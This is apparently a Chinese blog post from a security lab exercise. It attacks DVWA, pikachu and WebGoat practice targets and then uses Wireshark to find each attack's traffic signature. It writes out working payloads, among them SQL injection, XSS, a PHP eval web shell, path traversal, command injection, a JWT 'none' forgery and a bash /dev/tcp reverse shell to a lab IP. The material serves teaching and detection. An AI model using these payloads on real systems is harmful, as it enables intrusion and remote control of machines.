web漏洞的攻击及抓取攻击流量

已于 2023-12-09 12:28:59 修改
阅读量1k 收藏 25
点赞数 18
文章标签: 网络 服务器
于 2023-12-09 11:31:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy_wjyjw/article/details/134892662
版权

以dvwa靶场为例,使用wireshark抓取攻击流量,并定位关键字段

SQL注入

攻击

在sql注入攻击

1' and 1=2 union select version(),2#

image-20231208173546486

流量特征

在数据包中可以清晰的查看源IP和目的IP

在Wireshark选中Ethernet0网卡

  • 点击Submit,进行抓包

image-20231208174703154

  • 利用union select关键字开始抓包
  • 并在Wireshark中停止抓包

image-20231208175935863

  • 抓包成功

  • 查看目的ip地址的流量

ip.dst==192.168.63.138

image-20231208180307473

  • 成功找到union select关键字

image-20231208180525316

XSS

攻击

  • 注入XSS漏洞
<ScRiPt>alert(/xss/)</script>

image-20231208181831494

  • 注入成功

image-20231208182041059

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找关键字script

image-20231208190918157

  • 成功找到script关键字

image-20231208191031126

文件上传

攻击

上传一句话木马文件

<?php @eval($_POST[777]);?>

image-20231208192850808

上传成功

image-20231208193021019

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找后缀为.php的文件

image-20231208194525270

  • 成功找到1.php关键字
  • 可以看到1.php的内容

image-20231208194923347

文件包含

攻击

将url中page后的值改为file../../../../phpinfo.php

image-20231208201025718

image-20231208200938629

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../phpinfo.php

image-20231208202214395

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

image-20231208201954039

  • 成功找到关键字file../../../../phpinfo.php

image-20231208202054120

文件读取

攻击

image-20231208204058865

将url中的值改为

file/../../../../../../../../../../windows\system32\drivers\etc\hosts

image-20231208204341899

读取成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../../../../windows\system32\drivers\etc\hosts

image-20231208205305228

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

image-20231208205627801

成功找到关键字file../../../../../../../windows\system32\drivers\etc\hosts

image-20231208205745569

暴力破解

攻击

  • 输入用户名密码

image-20231208215819863

  • 用burp抓包

image-20231208220418418

爆破成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

image-20231208221302809

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.139&&http

image-20231208221701609

成功找到数据包的关键字

image-20231208221813168

命令执行

攻击

注入命令

ping 127.0.0.1 | whoami

image-20231208223349398

注入成功

image-20231208223424048

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Submit,进行抓包

image-20231208223737950

  • 查看目的ip地址的流量
ip.dst==192.168.63.139

image-20231208224037023

成功找到数据包的关键字

image-20231208224112232

SSRF

以pikachu靶场为例

攻击

更改url后的值

image-20231208211033151

更改为http://www.baidu.com

image-20231208211215362

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为http://www.baidu.com

image-20231208211443071

成功找到数据包中的关键字

image-20231208211531348

shiro反序列化

攻击

利用kali的IP开始攻击

image-20231208115556121

成功找到cc链

image-20231208115725468

尝试命令执行

image-20231208120017735

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Ethernet0
  • 执行

image-20231208160148600

  • 开始抓取流量

  • 并在Wireshark中停止抓包

image-20231208160727542

查看目的ip地址的流量

ip.dst==192.168.63.129

image-20231208160844980

  • 双击查看

  • 看到shiro反序列化的关键字rememberme=

image-20231208161147196

jwt

以WebGoat第4关靶场为例

攻击

首先登录Tom用户

image-20231207195218312

选择一个并开始投票,发现可以一致投票

image-20231207195800014

点击删除,提示只有admin用户才能清空

image-20231207200109571

利用bp开始抓包

image-20231207200623432

右击发送到Repeater

image-20231207200831802

将cookie的值利用进行JWT解码

image-20231207201039860

image-20231207201357130

利用base64编码,将HS512改为nonefalse改为true

image-20231207201730882

image-20231207202029275

分别将修改后的base64编码放在Encoded中

image-20231207202151133

将HEADER和PAYLOAD的Encoded放在bp的cookie中

image-20231207202340734

提示已经成功完成任务

image-20231207202427904

回到页面查看,删除成功

image-20231207202653914

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

image-20231208214815104

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&http

image-20231208215030666

成功找到数据包中的关键字

image-20231208215150445

反弹shell

前提:

准备两台虚拟机(kali、linux)

攻击

首先是kali开启监听

nc -lvvp 5555

image-20231209110753977

Linux连接kali

bash -i >& /dev/tcp/192.168.63.129/5555 0>&1
          或
bash -c "bash -i >& /dev/tcp/192.168.63.129/5555 0>&1"
#bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1

image-20231209111032892

监听成功

image-20231209111102278

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包中的cat /etc/passwd

image-20231209111703129

  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&tcp
  • 成功抓到tcp数据流中的关键字

image-20231209112423626

西柠!
关注
  • 18
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF web安全经典例题讲解
10-22
通过抓取网络流量攻击者可以分析通信过程,查找潜在的安全问题。改包则常用于模拟攻击,如修改请求头、伪造身份、篡改数据等。了解TCP/IP协议栈、HTTP协议、HTTPS解密等技术是必备的。 6. **实战演练**:图文结合...
web逆向工程(自动生成sql语句)
09-04
在IT行业中,Web逆向工程是一项重要的安全与分析技术,主要目的是通过研究Web应用程序的运行机制,揭示其内部的工作流程,以发现潜在的安全漏洞或优化性能。本话题将聚焦于如何利用工具和技术自动生成SQL语句,这在...
【项目】wireshark抓取攻击流量
wj33333的博客
12-10 590
演示如下漏洞攻击过程,攻击过程中使用wireshark抓取攻击流量,定位关键字段,要求过程截图描述,演示完回答如何判断该漏洞流量特征.
渗透测试学习笔记(metasploit)
hklearner的博客
02-21 3372
METASPLOIT exploit-db.com •Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 渗透攻击(exploit) 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。 攻击载荷(payload) 攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的
wireshark数据包分析与取证web流量分析
m0_74025111的博客
11-10 772
1.使用Wireshark查看并分析虚拟机windows10桌面下的web.pcap数据包,然后根据所得信息进行确定服务器上发起这些请求的源 IP 地址作为flag提交。提交格式flag{xxxxxxxxx}3.攻击者在我们的服务器上发现开放端口后,似乎试图枚举我们 Web 服务器上的目录和文件。4.在攻击者枚举 Web 服务器上的目录之后,攻击者发出了大量请求,试图识别管理界面。提交格式flag{xxxxxxxxx}其实题目的意思就是去查看登录的指纹 flag{manager}
Wireshark抓取攻击流量
最新发布
m0_70937289的博客
12-10 110
演示如下漏洞攻击过程,攻击过程中使用wireshark抓取攻击流量,定位关键字段,要求过程截图描述,演示完回答如何判断该漏洞流量特征。
wireshark网络安全流量分析基础
2201_75719295的博客
04-07 1914
作为网络流量安全分析的好工具,功能其实也很多,本次分享的只是一些常见功能,如果对网络流量安全分析感兴趣,可以多去使用wireshark研究攻击数据包特征,可以先从简单web攻击数据包开始,再去看看一些窃密、木马、APT相关数据包,后面我也会慢慢分享一些关于分析威胁流量包的文章,也是记录自己的一个学习过程。其他协议相关文件也一样。海量数据中要想能察觉到可疑通信,找到攻击的蛛丝马迹,那就需要对一些端口、协议、请求方式和攻击特征等进行过滤,不断缩小可疑流量范围,才能更好进一步分析达到最终溯源的目的。
web安全技术-实验六、文件上传漏洞.doc
08-20
它包含各种常见的Web安全漏洞,如SQL注入、XSS攻击以及我们关注的文件上传漏洞,提供了一个实践和学习安全漏洞的平台。 3. **安全等级设置**:DVWA的安全等级分为多个级别,从"low"(低)到"impossible"(不可能)...
web安全技术-实验一:burp的安装和https包的抓取.doc
08-20
Web安全技术是保护网站及其用户免受恶意攻击和数据泄露的重要领域。实验一的主题是“Burp Suite的安装和HTTPS包的抓取”,这是一项基础的网络安全实践,旨在教会学生如何利用工具检测和分析网络流量,尤其是加密的...
Web应用安全:抓包方法的注意点.pptx
06-19
Web应用安全领域中,抓包方法是排查和分析问题的...在处理Web应用安全问题时,了解并熟练运用这些方法,能够更快地定位安全漏洞,保护网站免受攻击。同时,注意隐私和合规性,避免非法抓取敏感信息,确保操作的合法性。
web安全攻击方法流量分析
博客地址 www.sec0nd.top
07-18 3438
想起来一个思路,用wireshark抓包工具,去看一下每种攻击行为的流量,如果能分析出一些攻击行为的流量特征也不错。之前也学过wireshark,但是做的都是一些其他流量分析,还没使用这个工具进行分析一些攻击行为。......
Wireshark 分析常见 Web 攻击流量特征
weixin_51559599的博客
12-08 4868
攻击者在输入字段中插入恶意的 SQL 语句,实现对数据库的增删改查。可以在 http 请求中通过查找 SQL 注入语句中的 union、select、sleep 等关键字来判断 SQL 注入的流量dvwa SQL Injection low 为例poc筛选目的 ip 为靶场服务器并且为 http 的流量找到 SQL 请求的 http 报文可以看到unionselectdatabase等 SQL 注入的关键字解码后即可看到原始 poc。
流量捕获】Wireshark使用,ARP缓存攻击、DNS缓存攻击、SSL攻击
weixin_55205599的博客
08-19 610
正常情况下,交换机只会让我们收到原本就是发给我们的数据包,需使用技术手段,让它们相信本不该发给我们的数据包可以发给我们。任何主机都可以回应这种广播“谁的IP地址是192.168.20.11”一类的ARP解析请求,哪怕他们的IP是192.168.20.12甚至其他地址。进行ARP缓存攻击,欺骗A、C,让它们把数据包发送到B,使用wireshark截获A、C的数据包。注意:ARP缓存攻击前,A的ARP缓存中已经存有C的条目。Arpspoof立即向A发送ARP应答,告诉C的网卡使用的是B的MAC地址。
蓝队技能:Wireshark捕获恶意攻击流量·上篇
qq_61553520的博客
04-09 900
过滤器:可以根据特定的IP,端口,协议等搜索特定的数据包摁下Ctrl+F会弹出筛选选项,可以指定内容筛选数据包。将主要叙述一些过滤器的用法。
攻击流量分析
2302_76965792的博客
12-09 178
演示一些攻击过程,攻击过程中使用wireshark抓取攻击流量,定位关键字段,打开pikachu靶场。
网络安全kali渗透学习 web渗透入门 WireShark抓包及常用协议分析
瓦罗兰特顶级C位的博客
08-04 1087
Wireshark是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
20222948 2022-2023-2 《网络攻防实践》第6周作业
Henry__Zhang的博客
04-19 199
网络攻防实践
Metasploit高级技术【第九章】
Kali与编程
04-15 436
Metasploit是一款开源的渗透测试和漏洞利用框架,可以支持多种操作系统和平台,提供多种攻击模块和工具,支持多种攻击技术和方法,如漏洞利用、密码破解、后门注入、社会工程学攻击等。Metasploit可以用于模拟黑客攻击漏洞扫描和评估、渗透测试和评估、安全防御和响应等场景,帮助安全团队测试系统的安全防御能力和漏洞修复效果,提供安全防御建议和措施。红队作战是一种有效的安全测试和评估手段,可以发现安全弱点和漏洞,提高安全意识和应急响应能力,提高安全防御能力,降低安全风险和损失,评估安全投资效果。
KaliLinux渗透工具详解:80+实用教程与攻击工具体现
8. CDPSnarf:抓取网络流量,提取敏感数据。 9. cisco-torch:Cisco设备的漏洞扫描工具。 10. CookieCadger:自动搜索网站cookies以进行会话劫持。 这些工具还包括端口扫描、域名枚举、DNS分析、网络跟踪、电子邮件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值